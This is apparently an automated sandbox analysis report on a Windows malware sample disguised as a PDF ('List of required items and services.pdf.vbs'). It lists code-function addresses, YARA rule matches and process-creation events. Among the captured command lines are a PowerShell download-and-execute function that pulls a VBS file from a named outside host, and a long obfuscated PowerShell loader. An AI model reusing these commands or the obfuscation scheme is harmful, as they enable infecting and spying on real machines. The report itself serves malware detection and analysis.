                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A21F4025_3_0000017161A21F40
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2027B25_3_0000017161A2027B
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2170E25_3_0000017161A2170E
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_3_0000017161A2366025_3_0000017161A23660
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716185262C25_2_000001716185262C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716185C2D025_2_000001716185C2D0
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186321825_2_0000017161863218
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00000171618774EC25_2_00000171618774EC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186FD3C25_2_000001716186FD3C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188F4B825_2_000001716188F4B8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00000171618514D025_2_00000171618514D0
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186E40425_2_000001716186E404
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161896C0825_2_0000017161896C08
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161880C4C25_2_0000017161880C4C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188D3C825_2_000001716188D3C8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186D73025_2_000001716186D730
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188474425_2_0000017161884744
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161877E5825_2_0000017161877E58
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186CE7025_2_000001716186CE70
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716187467825_2_0000017161874678
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161878E8825_2_0000017161878E88
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188669C25_2_000001716188669C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186C5D825_2_000001716186C5D8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716189156425_2_0000017161891564
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186758025_2_0000017161867580
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161885D8425_2_0000017161885D84
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161889DA825_2_0000017161889DA8
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00000171618855BC25_2_00000171618855BC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00000171618860EC25_2_00000171618860EC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716189011425_2_0000017161890114
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716187786825_2_0000017161877868
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716187089825_2_0000017161870898
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00000171618850A425_2_00000171618850A4
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188AFF025_2_000001716188AFF0
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716187E02825_2_000001716187E028
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716189104825_2_0000017161891048
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161865FCC25_2_0000017161865FCC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186EABC25_2_000001716186EABC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188420C25_2_000001716188420C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716189422125_2_0000017161894221
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188522425_2_0000017161885224
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716186723425_2_0000017161867234
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_0000017161890A4425_2_0000017161890A44
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188F15825_2_000001716188F158
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716188F9A425_2_000001716188F9A4
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839C330825_2_00007DF4839C3308
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839C0E7425_2_00007DF4839C0E74
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839C01A025_2_00007DF4839C01A0
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839C152C25_2_00007DF4839C152C
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839C9C7425_2_00007DF4839C9C74
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839BF8E025_2_00007DF4839BF8E0
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839BF04825_2_00007DF4839BF048
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839C27AC25_2_00007DF4839C27AC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839E848025_2_00007DF4839E8480
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839E9C1825_2_00007DF4839E9C18
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839E720025_2_00007DF4839E7200
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF4839E8FDC25_2_00007DF4839E8FDC
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_00007DF483A022CC25_2_00007DF483A022CC
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5FC62026_2_0000025C3F5FC620
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E9E1026_2_0000025C3F5E9E10
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5EE5FC26_2_0000025C3F5EE5FC
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5DC6AC26_2_0000025C3F5DC6AC
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F26D426_2_0000025C3F5F26D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5D8ECC26_2_0000025C3F5D8ECC
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5DBD4026_2_0000025C3F5DBD40
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5EA5D826_2_0000025C3F5EA5D8
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5D745426_2_0000025C3F5D7454
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E54A026_2_0000025C3F5E54A0
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F3C6026_2_0000025C3F5F3C60
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F333026_2_0000025C3F5F3330
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E93B426_2_0000025C3F5E93B4
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F2BC026_2_0000025C3F5F2BC0
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F237426_2_0000025C3F5F2374
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E9A7826_2_0000025C3F5E9A78
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F426426_2_0000025C3F5F4264
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E8A6026_2_0000025C3F5E8A60
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5EA94026_2_0000025C3F5EA940
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E98F826_2_0000025C3F5E98F8
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5EF84C26_2_0000025C3F5EF84C
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5DC0BC26_2_0000025C3F5DC0BC
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E287C26_2_0000025C3F5E287C
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F601F2826_2_0000025C3F601F28
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5EAEF026_2_0000025C3F5EAEF0
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5DD6DC26_2_0000025C3F5DD6DC
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5FC78826_2_0000025C3F5FC788
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5E8F9826_2_0000025C3F5E8F98
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5F478026_2_0000025C3F5F4780
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4452
                        Source: unknownProcess created: Commandline size = 4452
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4452Jump to behavior
                        Source: amsi32_5232.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 6216, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 5232, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@38/246@15/14
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B6286C CreateToolhelp32Snapshot,Thread32First,CloseHandle,SuspendThread,21_2_00007DF4F3B6286C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\g8ix97hz.vbsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7ec072bc-c1d3-175365-1034abd211c2}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kinbhusr.az0.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6216
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5232
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
